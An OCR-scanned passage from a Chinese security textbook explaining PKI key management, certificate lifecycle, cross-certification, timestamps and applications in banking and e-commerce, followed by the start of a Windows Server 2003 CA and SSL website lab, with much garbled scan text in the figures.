钥 恢复 机 制 , 即 密 钥 备份 与 密 钥 恢复 系统 。 密 钥 备 份 与 密 钥 恢复 是 由 可 信任 的 认证 机 构 
CA 来 完成 的 ,在 用 户 的 证 书生 成 时 ,加 密 密 钥 即 被 CA 备份 存储 了 ; 当 需 要 恢复 时 ,用 户 向 
CA 提出 申请 ,CA 会 为 用 户 自动 进行 恢复 。 

PKI 系统 中 一 般 需 要 配置 用 于 数字 签名 /验证 的 密 钥 对 和 用 于 数据 加 密 / 解 密 的 密 钥 
对 ,它们 分 别 被 称 为 签名 密 钥 对 和 加 密 密 钥 对 。 这 两 对 密 钥 对 对 于 密 钥 管理 有 不 同 的 要 求 。 

OC 签名 密 钥 对 。 签 名 密 钥 对 由 签名 私 钥 和 验证 公 钥 组 成 。 为 保持 其 唯一 性 ,签名 私 钥 
不 能 存档 备份 ,丢失 后 需要 重新 生成 新 的 密 钥 对 .原来 的 签名 可 以 使 用 旧 公 钥 的 备份 来 验 
证 。 所 以 ,验证 公 钥 需要 存档 备份 ,以 用 于 验证 旧 的 数字 签名 。 

注意 : 在 PKI 中 , 密 铀 恢复 指 加 密 密 铀 而 言 ,签名 私 钥 是 不 能 做 备份 的 ,因为 数字 签名 
是 支持 不 可 否认 性 的 ,那样 会 造成 签名 不 唯一 性 。 
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© 加 密 密 钥 对 。 加 密 密 钥 对 由 公 钥 和 解密 私 钥 组 成 。 为 防止 密 钥 丢失 时 不 能 解密 数 
据 , 解 密 私 钥 应 该 进行 存档 备份 ,以 便 能 在 任何 时 候 解 密 密 文 数据 。 加 密 公 钥 无 须 存 档 备 
份 , 加 密 公 钥 丢失 时 ,需要 重新 产生 密 钥 对 。 

显然 ,这 两 对 密 钥 对 的 管理 要 求 存在 互相 冲突 的 地 方 ,因此 系统 必须 针对 不 同 的 用 途 使 
用 不 同 的 密 钥 对 。 

为 了 避免 解密 密 钥 丢失 带 来 的 不 便 ,PKI 提供 了 密 钥 备份 与 解密 密 钥 的 恢复 机 制 , 即 密 
钥 备 份 与 恢复 系统 , 它 由 可 信任 的 CA 来 完成 。 

(5) 密 钥 和 证 书 的 更 新 

一 个 证 书 的 有 效 期 是 有 限 的 ,这 样 规定 既 有 理论 上 的 原因 ,又 有 实际 操作 的 因素 。 因 
此 ,在 很 多 PKI 环境 中 ,一 个 已 颁发 的 证 书 需 要 有 过 期 的 措施 ,以 便 更 换 新 的 证 书 。 为 解决 
密 钥 更 新 的 复杂 性 和 人 工 操作 的 麻烦 ,PKI 自动 完成 密 钥 或 证 书 的 更 新 .不 需要 用 户 干预 。 
即 在 用 户 使 用 证 书 的 过 程 中 ,PKI 会 自动 到 目录 服务 器 中 检查 证 书 的 有 效 期 ,在 有 效 期 到 来 
之 前 的 某 一 时 间 间 隔 内 (如 20 天 之 内 ) ,PKI/CA 会 自动 启动 更 新 程序 ,生成 一 个 新 证 书 来 
代替 旧 证 书 , 新 旧 证 书 的 序列 号 也 不 一 样 。 

(6) 证 书 历史 档案 

从 密 钥 更 新 的 概念 可 知 ,经 过 一 定时 间 以 后 ,每 一 个 用 户 都 会 形成 多 个 旧 证 书 和 至 少 有 
一 个 当前 新 证 书 。 这 一 系列 旧 证 书 和 相应 的 私 钥 组 成 了 用 户 密 钥 和 证 书 的 历史 档案 。 

记录 整个 密 钥 历史 是 一 件 十 分 重要 的 事情 ,因为 某 用 户 几 年 前 用 自己 的 公 钥 加 密 的 数 
据 或 者 是 其 他 人 用 自己 的 公 钥 加 密 的 数据 ,他 无 法 使 用 现在 的 私 钥 解 密 。 那 么 ,该 用 户 就 必 
须要 从 他 的 密 钥 历史 档案 中 ,查找 到 几 年 前 的 私 钥 来 解密 数据 。 如 此 类 似 地 ,有 时 也 需要 从 
密 钥 历史 档案 中 ,找到 合适 的 证 书 验证 某 用 户 几 年 前 的 数字 签名 。 因 此 ,PKI 必须 为 客户 建 
立 证 书 历史 档案 。 

CD 交叉 认证 

在 全 球 范 围 内 建立 一 个 容纳 所 有 用 户 的 单一 PKI 是 不 太 可 能 实现 的 。 现 实 可 行 的 
模型 是 建立 多 个 PKI 域 ,进行 独立 的 运行 和 操作 ,为 不 同 环境 和 不 同行 业 的 用 户 团体 
服务 。 

为 了 在 不 同 PKI 之 间 建 立信 任 关 系 , 产 生 了 “交叉 认证 ”的 概念 。 在 没有 一 个 统一 的 全 
球 的 PKI 环境 下 ,交叉 认证 是 一 个 可 以 接受 的 机 制 ,因为 它 能 够 保证 一 个 PKI 团体 的 用 户 
验证 另 一 个 团体 的 用 户 证 书 。 交 叉 认 证 是 PKI 中 信任 模型 的 概念 。 它 是 一 种 把 以 前 无 关 
的 CA 连接 在 一 起 的 机 制 ,从 而 保证 在 多 个 主体 群 间 实现 安全 通信 。 

交叉 认证 就 是 多 个 PKI 域 之 间 实 现 互 操作 ,这 个 PKI 域 签发 的 证 书 ,到 另 一 个 PKI 域 
里 也 能 承认 ,不同 的 PKI 域 之 间 的 用 户 ,都 要 求 验证 对 方 CA 发 放 的 证 书 , 这 就 是 交叉 认 
证 。 交 叉 认证 实现 的 方法 有 多 种 形式 .一 种 方法 是 桥接 CA, 即 用 一 个 第 三 方 CA 作为 桥 , 将 
多 个 CA 连接 起 来 ,成 为 一 个 可 信任 的 统一 体 ; 另 一 种 方法 是 多 个 CA 的 根 CACRCA) 互 相 
签发 根 证 书 , 这 样 当 不 同 的 PKI 域 中 的 终端 用 户 沿 着 不 同 的 认证 链 检验 认证 到 根 时 ,达到 
互相 信任 的 目的 。 

(8) 不 可 否认 性 

PKI 的 不 可 否认 性 适用 于 从 技术 上 保证 一 些 机 构 实 体 对 他 们 行为 的 不 可 否认 性 , 即 他 
们 对 自己 发 送出 和 接收 到 数据 的 事实 的 不 可 抵赖 性 。 如 甲 签发 了 某 份 文件 ,若干 时 间 后 ,他 
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不 能 否认 他 对 该 文件 进行 了 数字 签名 。 

从 数字 签名 的 角度 来 说 ,一 个 公司 或 机 构 需要 用 PKI 支持 不 可 否认 性 ,那么 维护 多 密 
钥 对 和 多 个 证 书 就 很 有 必要 。 要 真正 支持 不 可 否认 性 需要 一 个 必要 条 件 ,就 是 用 户 用 于 不 
可 否认 性 操作 的 私 钥 是 不 能 被 任何 其 他 人 知道 的 ,包括 可 信任 的 实体 CA 在 内 ; 否则 ,实体 
就 会 随便 地 宣布 这 个 操作 不 是 本 人 所 为 。 在 有 些 情况 下 ,这 种 私 钥 只 能 装载 在 防 算 改 的 硬 
件 加 密 模块 中 。 比 如 , 私 钥 装 载 在 IC 卡 中 , 它 既 不 能 被 自 改 ,也 不 能 被 复制 。 

相反 ,不 是 用 于 不 可 否认 性 的 密 钥 ,如 加 密 密 钥 ,如 前 所 述 , 它 可 在 一 个 可 信任 机 构 ( 如 
CA) 中 进行 备份 ,并 可 以 存放 在 软件 里 。 由 于 这 种 冲突 ,一 个 PKI 实体 一 般 要 拥有 两 对 或 
三 对 不 同 的 密 钥 对 及 相关 证 书 : 一 对 用 于 加 密 和 解密 ; 一 对 用 于 普通 的 签名 和 认证 ; 一 对 
用 于 不 可 否认 性 的 签名 和 认证 。 

CO) I] [a] gi, 
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肉 ( 以 格林 尼 治 时 间 为 标准 的 32bit 值 ) 。 重 要 的 不 是 时 间 本 身 的 精确 性 ,而 是 相关 日 期 时 
间 的 安全 性 。 支 持 不 可 否认 性 服务 的 一 个 关键 措施 ,就 是 在 PKI 中 使 用 时 间 苓 。 即 时 间 源 
是 可 信和 的, 它 赋 予 的 时 间 值 必须 被 安全 地 传送 。 

PKI 中 必须 存在 用 户 可 信任 的 权威 时 间 源 。 权 威 时 间 源 提供 的 时 间 并 不 需要 准确 , 它 
为 用 户 提供 一 个 “参照 ”时 间 ,以 便 完成 基于 PKI 的 事务 处 理 。 如 事件 A 发 生 在 事件 B 的 前 
面 等 。 一 般 PKI 中 都 设置 一 个 时 钟 系统 ,统一 PKI 的 时 间 。 当 然 , 也 可 以 用 世界 官方 时 间 
源 所 提供 的 时 间 。 其 实 ,现实 方法 是 从 网 络 上 权威 时 间 源 获得 时 间 。 要 求实 体 在 需要 时 向 
这 些 权威 请 求 在 数据 上 盖 上 时 间 截 。 一 份 文档 上 的 时 间 戳 涉及 对 时 间 和 文档 内 容 的 Hash 
值 , 即 数字 签名 。 权 威 的 签名 提供 了 数据 的 真实 性 和 完整 性 。 

(10) 客户 端 软 件 

客户 端 软 件 是 一 个 全 功能 、 可 操作 PKI 的 必要 组 成 部 分 。 为 方便 客户 操作 ,解决 PKI 
的 应 用 问题 ,客户 端 软件 应 该 具有 如 下 的 主要 功能 。 

CD 查询 证 书 和 相关 的 证 书 撤销 信息 以 及 进行 证 书 路 径 处 理 。 

© 对 特定 文档 提供 时 间 蕉 请 求 。 

@ 实现 数字 签名 、 加 密 传 输 数 据 。 

总 之 , 它 像 客 户 机 /服务 器 一 样 ,客户 端 提 出 请 求 服务 ,服务 器 端 为 此 能 够 做 响应 处 
理 。 客 户 端 软件 在 桌面 系统 中 运行 , 它 透 明 地 通过 桌面 系统 中 的 应 用 提供 一 致 性 的 安全 
服务 。 

QD 证 书 运 作 声 明 

证 书 运作 声明 (Certificate Practice Statement,CPS) 也 称 证 书 运 作 规 范 , 它 是 PKI 不 可 
缺少 的 安全 策略 组 成 部 分 。 它 由 前 言 ,总 论 、 一 般 规定 .鉴别 与 授权 .运作 要 求 、 技 术 安 全 控 
制 .证 书 以 及 CRL 结构 等 章节 组 成 。 主 要 规定 CA 及 用 户 各 方 的 义务 、 责 任 以 及 如 何 确保 
CA 运作 的 安全 。 

3. PKI 的 国际 标准 

PKI 的 国际 标准 见 表 3-7。 


73 


表 3-7 PKI 的 国际 标准 


际 标 准 di 述 
PKICPublic-Key Infrastructure) 公 钥 体系 基础 框架 
"— Hi ISO 和 ITU 提出 的 为 大 型 网 络 提供 目录 服务 的 
标准 体系 
X. 509 为 X. 500 提供 验证 (Authenticating) 体 系 的 标准 
PKIX(Public-Key Infrastructure Using X. 509) 使 用 X. 509 的 公 钥 体系 基础 框架 
PKCSCPublic Key Cryptography Standards) 公 钥 加 密 标 准 ,为 PKI 提供 一 套 完 善 的 标准 体系 
4. PKI 的 应 用 


PKI 提供 的 安全 服务 是 电子 商务 .电子 政务 .网 上 银行 .网 上 证 券 等 金融 业 交易 的 安全 
需求 ,是 这 些 活动 必 备 而 不 可 缺少 的 安全 保证 ,没有 这 些 安全 服务 提供 各 种 安全 保证 ,电子 
商务 .电子 政务 .网 上 银行 .网 上 证 券 等 是 开通 不 了 的 。 所 以 PKI 是 一 个 国家 电子 商务 、 电 
子 政务 的 基础 建设 。 

(1) 电子 商务 

电子 商务 按 应 用 模式 分 类 有 B2C、B2B 和 B2G 等 模式 , 按 交易 形式 可 分 为 买方 主导 型 、 
卖方 主导 型 和 电子 交易 市 场 型 。 各 种 应 用 模式 和 交易 形式 的 交易 流程 各 不 相同 ,但 在 国内 
外 电子 商务 中 ,电子 交易 市 场 型 是 发 展 主流 ,在 此 就 其 一 般 流程 加 以 简要 叙述 。 

一 般 电 子 商 务 的 参与 方 有 买方 .卖方 .银行 和 作为 中 介 的 电子 交易 市 场 。 买 方 通过 自己 
的 浏览 器 上 网 ,登录 到 电子 交易 市 场 的 Web 服务 器 ,寻找 卖方 虚拟 电子 商场 。 当 买方 登录 
服务 器 时 ,互相 要 验证 对 方 证 书 , 相 互 确认 对 方 身份 , 称 双向 认证 (B2B 要 求 ) 。 

互相 身份 确认 以 后 ,建立 起 安全 通道 ,买方 浏览 卖方 的 商品 ,进行 讨价还价 之 后 向 商场 
提交 订单 ,其 中 电子 交易 市 场 起 中 介 作用 。 订 单 里 有 两 种 信息 ,一 部 分 是 订货 信息 ,包括 商 
品名 称 和 价格 ; 另 一 部 分 是 提交 银行 的 支付 信息 ,包括 金额 和 支付 账号 。 买 方 对 这 两 种 信 
息 进 行 “双重 数字 签名 ”, 分 别 用 商场 和 银行 的 证 书 公 钥 加 密 上 述 信息 。 当 商场 收 到 这 些 交 
易 信 息 后 , 留 下 订货 单 信息 ,而 将 支付 信息 转发 给 银行 。 商 场 只 能 用 自己 专 有 的 私 钥 解 开 用 
自己 的 公 钥 加 密 的 订货 单 信息 ,验证 签名 ,而 因 没 有 银行 的 私 钥 , 解 不 开 加 密 的 支付 信息 ,看 
不 到 买方 的 账号 。 同 理 , 银 行 只 能 用 自己 的 私 钥 解 开 加 密 的 支付 信息 ,验证 签名 ,进行 划 账 ， 
而 看 不 到 买方 买 什么 商品 ,做 到 隐私 权 的 保护 。 银 行 在 完成 划 账 以 后 ,通知 起 中 介 作 用 的 电 
子 交 易 市 场 、 物 流 中 心 和 买方 ,并 进行 商品 配送 。 整 个 交易 过 程 都 是 在 PKI 所 提供 的 安全 
服务 之 下 进行 ,做 到 了 安全 、 可 靠 , 保 密 和 不 可 否认 性 。 

(2) 电子 政务 

电子 政务 就 是 指 将 计算 机 网 络 技术 应 用 于 政务 领域 ,其 主 内 容 有 : 网 上 信息 发 布 . 办 公 
自动 化 .网 上 办 公信 息 资 源 共 享 等 。 按 应 用 模式 也 可 分 为 G2C、G2B、G2G。PKI 在 电子 政 
务 中 的 应 用 ,主要 解决 身份 认证 ,数据 完整 性 .数据 保密 性 和 不 可 抵赖 性 等 问题 。 电 子 政务 
的 应 用 领域 很 多 ,这 里 仅 就 其 主要 的 安全 处 理 流 程 加 以 说 明 。 如 一 个 保密 文件 发 给 谁 , 某 个 
保密 文件 哪 一 级 的 公务 员 有 权 查 阅 等 ,这 就 需要 进行 身份 认证 ,与 身份 认证 相关 的 是 访问 控 
制 , 即 权限 控制 。 认 证 是 通过 证 书 进行 的 ,访问 控制 是 通过 属性 证 书 或 访问 控制 列表 
(ACL) 完 成 的 。 有 些 文件 在 网 传输 中 要 加 密 . 保 证 数据 的 保密 性 ; 有 些 文件 在 网 上 传输 要 
求 不 能 被 丢失 和 被 算 改 ; 特别 是 一 些 保密 文件 的 收发 必须 要 有 数字 签名 ,抵抗 否认 性 。 电 
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子 政务 中 的 这 些 安全 需求 ,只 有 PKI 提供 的 安全 服务 才能 得 到 保证 。 

(3) 网 上 银行 

网 上 银行 是 借助 于 互联 网 技术 向 客户 提供 信息 服务 和 金融 交易 服务 的 新 兴 产 业 。 银 行 
在 互联 网 上 建立 站 点 ,通过 互联 网 向 客户 提供 信息 查询 、 对 账 `. 网 上 支付 资金 划 转 、 信 贷 业 
务 及 投资 理财 等 金融 服务 。 网 上 银行 的 应 用 模式 有 B2C 个 人 业务 .B2B 公司 业务 两 种 。 在 
网 上 开通 这 种 虚拟 银行 的 关键 问题 是 解决 安全 问题 。PKI 是 网 上 银行 安全 的 基本 保证 。 

网 上 银行 的 交易 方式 是 点 对 点 的 , 即 客户 对 银行 。 客 户 浏览 器 端 装 有 客户 证 书 , 银 行 服 
务 器 端 装 有 服务 器 证 书 。 当 客户 上 网 访问 银行 服务 器 时 ,银行 端 首先 要 验证 客户 端 证 书 , 检 
查 客户 的 真实 身份 ,确认 是 否 为 银行 真实 客户 ; 同时 服务 器 还 要 到 CA 的 目录 服务 器 ,通过 
LDAP 协议 ,查询 该 客户 证 书 的 有 效 期 和 是 否 进入 黑 名 单 ; 认证 通过 后 ,客户 端 还 要 验证 银 
行 服务 器 端 证 书 , 如 上 所 述 ,此 为 双向 认证 。 双 向 认证 通过 以 后 ,建立 起 安全 通道 。 客户 端 
提交 交易 信息 ,经 过 客户 的 数字 签名 并 加 密 后 传送 到 银行 服务 器 ,网 关 转 换 后 , 送 到 银行 后 
台 信 息 系统 进行 划 账 ,并 将 结果 进行 数字 签名 返回 客户 端 。 这 样 就 做 到 了 支付 信息 的 保密 
和 完整 ,交易 双方 的 不 可 否认 性 。 可 以 说 ,PKI 的 服务 与 网 上 银行 的 安全 要 求 进行 了 完美 的 


d 
结合 。 


网 上 银行 的 交易 具有 如 下 特点 : 可 在 任意 时 间 、 任 意 地 点 和 任意 方式 通过 互联 网 提交 
交易 。2003 年 在 全 国 抗击 SARS 的 工作 中 ,网 上 银行 在 我 国 经 济 活动 中 起 到 了 非常 好 的 作 
用 ,人 们 可 以 不 到 银行 柜台 , 互 不 见面 即 可 照常 办 理 银 行业 务 。 同 年 4 一 5 月 全 国 网 上 银行 
交易 量 几 乎 增加 一 倍 , 在 全 国 抗击 SARS 的 活动 中 网 上 银行 的 作用 可 见 一 斑 。 

(4) 网 上 证 券 

网 上 证 券 广义 地 讲 是 证 券 业 的 电子 商务 , 它 包括 网 上 证 券 信息 服务 、 网 上 股票 交易 和 网 
上 银 证 转账 等 。 网 上 证 券 一 般 属于 B2C 应 用 模式 。 股 民 为 客户 端 , 装 有 个 人 证 书 ,券商 为 
服务 器 端 装 有 Web 证 书 。 在 线 交 易 时 ,券商 服务 器 只 要 认证 股民 证 书 即 可 ,验证 是 否 为 合 
法 股民 ,是 单 向 认证 过 程 ,认证 通过 后 ,建立 安全 通道 ; 股民 在 网 上 的 交易 提交 同样 要 进行 
数字 签名 ,网 上 信息 要 加 密 传输 ; 券商 服务 器 收 到 交易 请 求 并 解密 ,进行 资金 划 账 做 数字 签 
名 ,将 结果 返回 给 客户 端 。 网 上 证 券 的 每 一 交易 步骤 ,都 离 不 开 PKI 的 支持 。 

5. PKI 的 国内 外 发 展 

世界 各 地 ,尤其 是 发 达 国 家 ,已 充分 认识 到 PKI 对 国家 利益 的 重要 性 。 它 是 互联 技术 
的 制高点 ,是 互联 网 发 展 和 安全 的 保证 。 

COD 美国 代表 发 达 国 家 PKI 发 展 的 主流 ,在 研究 各 联邦 政府 已 建成 的 PKI 体系 的 基础 
上 ,于 1998 年 提出 桥接 CA 的 方案 ,联邦 桥接 CA 由 联邦 策略 管理 机 构 控 制 ,其 目的 是 在 联 
邦 不 同 的 PKI 域 中 提供 可 信任 路 径 。 

(20 欧盟 于 1997 年 发 表 了 “欧洲 电子 商务 的 主导 权 ” 报 告 , 为 促进 PKI 建设 提供 了 良好 
的 法 律 保障 。 欧 盟 为 了 解决 各 国 的 PKI 协同 工作 问题 ,在 信息 社会 理事 会 设立 项 目 以 资助 
研究 PKI 技 术 。 

(D 日 本 政府 将 PKI 管理 分 为 两 部 分 , 即 公众 和 私人 两 大 领域 。 日 本 PKI 组 织 架 构 包 
括 : 策略 批准 机 构 、 策 略 执行 机 构 、 认 证 机 构 、 注 册 机 构 和 证 书 使 用 者 。2000 年 由 日 本 、 韩 
国 、 新 加 坡 等 国家 发 起 了 “亚洲 PKI 论坛 ”, 中 国内 地 、 中 国 台 湾 地 区 、 中 国 香 港 地 区 也 参加 
了 “亚洲 PKI 论坛 ”。 
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CD 国内 近 几 年 PKI 有 和 较 大 发 展 ,自从 1998 年 第 一 个 认证 中 心 建立 以 来 ,截至 目前 已 
建设 了 七 十 几 家 CA, 人 们 过 高 地 估计 了 中 国电 子 商务 对 CA 的 需求 ,CA 建设 显得 过 热 。 
目前 在 电子 商务 、 电 子 政务 中 起 不 同 作用 的 有 中 国 金 融 CA(CFCA)、 中 国电 信 CA、 外 经 贸 
CA 和 地 方 上 海 CA。 其 中 中 国 金融 CA 是 国家 级 CA, 由 人 民 银 行 牵头 ,13 家 商业 银行 参加 
联合 共 建 的 。 它 是 目前 具有 国际 先进 水 平 的 PKI 系统 ,能 为 电子 商务 、 网 上 银行 提供 一 整 
套 PKI 安全 服务 支持 ,已 为 各 商业 银行 的 网 上 银行 B2B 业务 发 放 了 10 万 多 张 高 级 证 书 。 
目前 系统 已 经 过 全 面 升级 ,达到 了 空前 的 稳定 性 和 安全 性 , 它 将 会 为 中 国 的 电子 商务 起 到 越 
来 越 大 的 作用 。 


37 实例 : 构建 基于 Wndows 的 CA 系统 


实验 环境 如 图 3-96 所 示 。 


客户 端 Windows XP 


218.198.18.91 
证 书 服务 器 ; 
wesa B dg gj 
Windows 2003 交换 机 Windows 2003 
218.198.18.93 218.198.18.96 
图 3-96 ”实验 环境 


PKI 原 理 回 顾 : PKI 是 一 个 用 公 钥 密码 学 技术 来 实施 和 提供 安全 服务 的 安全 基础 设 
施 , 它 是 创建 管理 ,存储 、 分 布 和 作废 证 书 的 一 系列 软件 .硬件 、 人 员 、 策 略 和 过 程 的 集合 。 
PKI 以 数字 证 书 为 基础 ,使 用 户 在 虚拟 的 网 络 环境 中 能 够 验证 相互 之 间 的 身份 ,并 保证 敏感 
信息 传输 的 机 密 性 、 完 整 性 和 不 可 否认 性 ,为 电子 商务 交易 的 安全 提供 了 基本 保障 。CA I 
统 是 PKI 的 核心 ,因为 它 管理 公 钥 的 整个 生命 周期 。 

Windows Server 2003 对 PKI 做 了 全 面 支持 ,在 提供 高 强度 安全 性 的 同时 ,还 与 操作 系 
统 进行 了 紧密 集成 ,并 作为 操作 系统 的 一 项 基本 服务 而 存在 ,避免 了 购买 第 三 方 PKI 所 带 
来 的 额外 开销 。 

SSL(Secure Socket Layer, 安 全 套 接 字 层 ) 是 由 Netscape 公司 开发 的 ,被 广泛 应 用 于 
Internet 上 的 身份 认证 及 Web 服务 器 和 用 户 端 浏 览 器 之 间 的 安全 数据 通信 。SSL 协议 在 
TCP/IP 协议 之 上 ,在 HTTP 等 应 用 层 协议 之 下 ,对 基于 TCP/IP 协议 的 应 用 服务 是 完全 透 
明 的 。 利 用 CA 颁发 的 证 书 , 在 服务 器 和 客户 端 之 间 建 立 可 靠 的 会 话 , 从 而 保证 两 者 之 间 通 
信和 的 安全 性 。 通 过 此 类 功能 ,企业 就 可 以 为 相关 用 户 颁发 证 书 ,并 利用 它 来 控制 只 有 获取 证 
书 的 用 户 才 可 以 进行 基于 安全 通道 协议 ( 即 对 Web 网 站 上 加 密 文件 的 访问 使 用 https. rfi dE 
http 方式 ) 验 证 的 访问 。 实 验 过 程 如 下 。 

1. 安装 证 书 服务 器 (CA 服务 器 ) 

在 218. 198. 18. 93 计算 机 上 ,创建 ISCWeb 服务 器 ) 和 创建 CA 认证 中 心 。 

COD 创建 IS 

依次 选择 “开始 ”>“ 控 制 面板 ”>“ 添 加 /删除 程序 ”>“ 添 加 /删除 Windows 组 件 ” 命 令 , 出 现 
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| 


"Windows 组 件 向 导 ” 对 话 框 ,如 图 3-97 所 示 , 选 择 “ 应 用 程序 服务 器 *。 单 击 “ 详 细 信 息 ” 按 钮 , 选 
择 如 图 3-98 所 示 的 选项 , 单 击 “确定 ”按钮 , 回 到 图 3-97 中 , 单 击 “ 下 一 步 ” 按 钮 ,完成 IIS 的 安装 。 


p" = ELLIIII] xi 
"DUETONNER. Yindovs MAPP. ^ BE, WEESUNDEE. XOMERT S SUEUHEPAS— 
~ Lu [ru es 
m E 应 用 程序 服务 器 MPEP O 
nn [3 Spisr arr oo z] 
aeo |v OBARA cow 访问 
EFI 26m 2 OBa m 访问 0.0 mB 
1 mn [C s iN UAI 7.0 Um 
TT Meg |v 移 应 用 程序 服务 器 控制 各 oom .| 
tt SE Ro II 包括 ab FIP, SITP 和 TP YR, LIB FrontPage Server 
BeO QUÉ dram, Internat ARRS CI) RRIUUERGHAUGM on Rl Active Server Page SP) 5 
Hans esum 
amanea wii 
Bim 14.5 mB wna 
qRESUS 1191.4 四 EI 
«i-sm|r-so»| mm | em | CJ 取消 
图 3-97 Windows 组 件 向 导 图 3-98 详细 信息 


(2) 创建 CA 认证 中 心 

第 1 步 : 在 图 3-97 中 选择 “证 书 服务 ”, 出 现 “Microsoft 证 书 服务 ”对 话 框 ,如 图 3-99 所 
示 , 单 击 “ 是 ”按钮 , 回 到 图 3-97 中 , 单 击 “ 详 细 信 息 ” 按 钮 , 出现“ 证 书 服务 ”对 话 框 ,如 
图 3-100 所 示 ,选中 其 中 的 两 项 , 单 击 “ 确 定 ” 按 钮 ,开始 安装 。 


A BENI ESEN ee 
[vom xe 


图 3-99 ”中 国 金融 CA 结构 


第 2 步 : 在 图 3-101 中 ,选择 证 书 颁发 类 型 “独立 根 CA", 


c0a-——— > 
Ed 


证 书 服务 MFE O 


CY 证 书 服务 CA XI: 四 
加 RERS Yeb 注册 支持 6 BTW Ck 


dio 设置 一 个 颁发 并 管理 数字 证 书 的 CA。 gris cs mE ice aireetey TT 


T- 用 自 定义 设置 生成 密 钥 时 和 CA 证 节 QD 


所 需 磁 盘 空 间 6.0 MB 
可 用 磁盘 空间 1350.1 MB 
Emm «x-se[r-sm»] xm | wm» | 
图 3-100 证 书 服务 组 件 图 3-101 CA 类 型 


可 选择 的 证 书 颁发 类 型 包括 : 企业 根 CA、 企 业 从 属 CA 、 独 立根 CA 和 独立 从 属 CA. 
企业 根 CA 和 独立 根 CA 都 是 证 书 颁发 体系 中 最 受信 任 的 证 书 颁发 机 构 , 可 以 独立 地 
颁发 证 书 。 企业 根 CA 需要 Active Directory 支持 ,而 独立 根 CA 不 需要 。 
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从 属 级 的 CA 由 于 只 能 从 另 一 个 证 书 颁 发 机 构 获 取证 书 , 所 以 一 般 不 选择 。 

在 Windows Server 2003 中 ,企业 根 CA 使 用 Active Directory 来 确定 申请 人 的 身份 ， 
确定 申请 人 是 否 具 有 申请 他 们 所 指定 的 证 书 类 型 的 安全 权限 ,并 由 此 自动 确定 是 否 立 即 颁 
发 证 书 或 拒绝 申请 ,这 种 策略 设置 不 能 被 更 改 。 如 果 选 择 此 选项 一 定 要 注意 保护 含有 此 服 
务 的 服务 器 ,不 能 直接 暴露 在 外 。 

独立 根 CA 可 以 选择 在 收 到 申请 时 自动 颁发 证 书 或 将 申请 保持 为 挂 起 状态 ,由 管理 员 
验证 证 书 申请 者 的 真实 性 及 合法 性 ,决定 是 否 颁 发 证 书 。 

第 3 步 : 在 图 3-101 rp , 单 击 * 下 一 步 "按钮 ,填写 CA 识别 信息 ,如 图 3-102 所 示 。 单 击 “ 下 
一 步 ” 按 钮 ,出 现 “ 证 书 数据 库 设 置 " 对 话 框 ,如 图 3-103 所 示 ,选择 证 书 数据 库 及 日 志 的 位 置 。 


| EET x 


ca 识别 信息 = 证 书 数 血库 设置 = 
MARBRE CA ANEB. f, SATSSEE SEFRSMRERENTE. | 她 

此 CA 的 公用 名 称 E) WEBER D 

[ries [TD ix o» 

可 分 辩 名 种 后 如 QD 证 效 数据 库 日 志 @) ， 


[pc-xxv, DC=EDV FE rDo :ys Cer tLog. mE. 


———Ó— 
TANEM D et 


共享 文件 来 gg 
[CNE js JCA, DC-TIV, DC-EDU a — — — n! T 
有 效 期 限 V) WEAN: * 
Pom ou 2011-6-4 22:41 T^ (8 EIBUREUGE SENI QD. 


—»» | 1 


<eo EETA xm | ww | 


图 3-102 CA 识别 信息 图 3-103 ”证书 数据 库 设 置 


第 4 步 : 在 图 3-103 中 , 单 击 * 下 一 步 ? 按 钮 ,出 现 如 图 3-104 所 示 对 话 框 ,询问 是 否 停止 
IIS, 单 击 * 是 ?按钮 ,出 现 如 图 3-105 所 示 对 话 框 。 配 置 组 件 过 程 中 ,出 现 如 图 3-106 所 示 对 
话 框 , 单 击 * 是 按钮。 出 现 如 图 3-107 所 示 对 话 框 , 单 击 “ 完 成 "按钮 ,安装 完成 。 


indors MEAS 


正在 配置 组 件 
安装 程序 正在 根据 您 的 请 求 进行 配置 更 以. 


5 GENE, SCEEIEIETEBCEHER. MEIRA PEENE. 


状态 。 正在 充 成 群集 服务 CONDE. 


3l 
d 要 完成 安装 ， 证 书 服务 必须 暂时 停止 Internet SARS. 'ERIREISIER ART 
LAT] sw 3-5 [5o »| se | 
图 3-104 是 否 停 止 IIS 图 3-105 配置 组 件 
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e 


Microsoft BES [x 


许 证 书 | zas Web, 服务 ， Internet 信息 服务 OIS) 中 局 用 Active Server Page (ASP). BH ASP 是 一 个 潜在 的 安 
5 nm EIE. qn. á BHE» EER BAE. 局 用 此 功能 ， IIS. 


Active Server Page 


[EX] sw 


图 3-106 中国 金融 CA 结构 


第 5 步 : 设置 证 书 服务 管理 。 依 次 选择 "开始 ”>“ 程 序 ”>“ 管 理工 具 ”> “证书 颁 发 机 
构 ” 命 令 , 出 现 如 图 3-108 所 示 对 话 框 。 右 击 "jsjCA”, 选 择 “ 属 性 ”一 “策略 模块 ”, 如 图 3-109 
所 示 。 单 击 * 属 性 ?按钮 ,如 图 3-110 所 示 ,选择 将 证 书 请 求 状态 设置 为 挂 起 ,管理 员 必 须 明 
确 地 颁发 证 书 ”, 单 击 “ 确 定 ” 按 钮 ,完成 证 书 服务 管理 的 设置 。 


| 
XD MEW FEV WMV 


- e-[mmeBBSm»n | 
完成 “Windows 组 件 向 导 ” 证 书后 发 机 构 本 地 ) 
8 MAE 
做 已 成 功 地 克成 了 windovs 组 件 向导 - -下 mames 
gites, m Rn. 
| 上 oil 
图 3-107 安装 完成 图 3-108 证 书 颁 发 机 构 
EI x CE 
存放 | 。 证 书 管理 种 限制 | g | 安全 | 请 求 处 理 | 
RR NER | meam | 。 扩展 
| 活动 第 略 模块 描述 Yindors 默认 第 咯 模块 控制 此 CA 在 阮 认 情况 下 如 何 处 理 证 书 请 
E Windows 默认 *. 
| me Bppn ema ca it ERENER IA CT T OMA 
Ls VES queue C BUCEURUSEGICSNE. ESRAR) 
| 版 权 所 有 4C) Microsoft Corporation 保留 所 有 权利 
- z c ETIN se SERI, 将 自动 颁发 
meon. Lu e. 
me | ZI Cm] mm jose 
3-109 jsjCA 属性 图 3-110 请求 处 理 


2. 安装 Web 服务 器 (SSL 网 站 ) 

在 218. 198. 18. 96 计算 机 上 ,创建 Web 服务 器 。 

第 1 步 : 安装 IIS, 过 程 和 在 218. 198. 18. 93 计算 机 上 一 样 。 

第 2 步 : 依次 选择 “开始 ”>“ 程 序 ”>“ 管 理工 具 ”>“Internet 信息 服务 (IIS) 管 理 器 ” 命 
令 ,出 现 如 图 3-111 所 示 对 话 框 。 右 击 “ztg 网 站 ”, 选 择 “ 属 性 ”一 “ 主 目 录 ”, 如 图 3-112 所 
